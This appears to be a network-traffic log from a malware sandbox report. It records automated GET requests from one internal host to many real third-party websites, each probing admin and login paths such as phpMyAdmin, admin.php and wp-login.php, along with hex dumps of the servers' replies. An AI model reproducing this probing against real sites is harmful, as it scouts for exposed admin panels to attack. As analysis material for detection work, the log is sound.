Feb 21, 2024 00:26:11.079854012 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]

Session ID	Source IP	Source Port	Destination IP	Destination Port
218	192.168.2.6	58990	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.922498941 CET	183	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.102668047 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
219	192.168.2.6	59051	208.109.43.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.937367916 CET	179	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.101156950 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://waukesha-water.com/phpMyAdmin/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
220	192.168.2.6	59060	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.968950987 CET	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.446518898 CET	378	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.netzschnipsel.de/phpMyAdmin/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
221	192.168.2.6	59096	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.000286102 CET	180	OUT	GET /admin.php HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.164588928 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
222	192.168.2.6	59087	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.007617950 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.186779976 CET	433	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://popular.de/phpMyAdmin/ Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
223	192.168.2.6	59278	72.52.178.23	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.030169964 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.187985897 CET	363	IN	HTTP/1.1 302 Moved Temporarily Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:11 GMT Location: http://ww1.imailzone.com/PhpMyAdmin/?usid=15&utid=26948359291 Pragma: no-cache Connection: Keep-Alive X-Powered-By: PHP/5.4.16 Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
224	192.168.2.6	59105	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.031631947 CET	172	OUT	GET /admin.php HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.214488029 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:11 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 37 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 Data Ascii: 573<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+![])
Feb 21, 2024 00:26:11.214555025 CET	456	IN	Data Raw: 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 Data Ascii: +(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("o
Feb 21, 2024 00:26:11.214567900 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
225	192.168.2.6	59148	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.040527105 CET	172	OUT	GET /wp-login.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.223675966 CET	435	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://popular.de/wp-login.php Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/wp-login.php">here</a>.</p></body></html>
Feb 21, 2024 00:26:12.742228985 CET	211	OUT	GET /wp-admin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://popular.de/wp-login.php
Feb 21, 2024 00:26:12.921772003 CET	429	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Location: https://popular.de/wp-admin/ Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/wp-admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
226	192.168.2.6	59163	64.190.63.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.042396069 CET	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.484116077 CET	1286	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:11 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_aQfqsc7HFBb0rrb2ug7ODO42YkFQkyeIvNj1MO07bimi+Bn6ueFKn2HRTeJfStA8HQCvld+uDLZBxKV0MI3XbA== last-modified: Tue, 20 Feb 2024 23:26:11 GMT x-cache-miss-from: parking-6db66cd898-fhb8p server: NginX content-encoding: gzip Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 59 eb 6e db 38 16 fe bf 4f a1 7a 90 45 3b b5 6c d9 89 1d 47 8e 0b 24 4d 33 4d 9b 5e d2 a6 d3 76 8a a2 a0 24 ca 62 2d 91 1a 91 f2 a5 1e 03 fb 1a fb 7a fb 24 7b 48 4a b6 24 cb 6e 32 98 18 89 25 92 e7 f0 5c be 73 21 73 fa e0 e2 cd d3 db cf 6f 9f 19 81 88 c2 27 a7 f2 af 11 22 3a 1e 35 30 6d 18 86 87 04 32 91 e7 84 cc 9d 4c f0 62 f4 ea 72 36 bb b8 f9 fc e2 25 fb e3 2a 98 ba af cf 6e 9e 9d 9f df 9c 5d bc 9f 9d cd de 9f bd 38 3f 7b 4d 17 e1 c7 59 77 7a fd f9 28 f8 40 4f 66 56 ff c7 cd 4b 27 78 79 ee 4f bf 5f 7e 78 ca bd cb d0 e9 df 7a 37 c1 dc 39 79 f7 e9 e3 a7 f4 ea 48 1c 76 dc c7 6c e0 7f 7e 33 6d f3 c1 9f 9d eb df de 8e d1 e1 c5 b3 ce 75 5b 3c ff 70 74 fd ec f5 ab a7 67 b3 67 67 67 37 a3 d1 37 74 e3 ff c9 dd e3 e7 97 e7 8e 95 24 4e 37 1d 1f bf b9 78 73 d4 fd 3c b9 bc 99 2c f0 d5 f4 f5 f7 ce ab 37 d6 b1 43 22 f2 f8 9c f6 53 7c f9 92 76 9f bf bb c5 2f fc f7 e2 6c f0 fc e6 e9 34 f4 1e a7 17 d7 7f 9c cf 5f fe 6e bd ba 3a fc e4 9c 8d 46 a0 3a 46 de 93 d3 08 0b 64 b8 01 4a 38 16 a3 46 2a 7c 73 d0 78 72 2a 88 08 f1 13 ee 06 29 e7 29 f5 04 4b 5a 1e fe 37 75 78 3c 34 f5 d7 6d 40 b8 31 c3 0e 27 02 1b f0 e8 b3 c4 e0 28 c4 0f 4a ab 8a 1c 8c 77 98 b3 34 71 31 37 10 f5 8c 2b 0a 24 11 12 84 d1 d6 69 5b 6f a8 a5 a1 28 c2 a3 c6 94 e0 59 cc 12 d1 30 5c 46 05 a6 20 dd 8c 78 22 18 79 78 4a 5c 6c aa 97 26 a1 44 10 14 9a dc 85 bd 47 9d 96 d5 8c d0 9c 44 69 54 18 49 39 4e d4 2b 72 60 c4 6a 94 b6 f1 30 77 13 12 4b 31 0a 3b ed d4 ce a8 d8 44 4e 2e 40 2b c3 27 09 17 4a 31 07 c3 83 d6 54 d1 a1 30 34 98 6f 88 00 16 6f 74 96 54 ff fb cf 7f 13 6c 84 8c 4d 08 1d cb b5 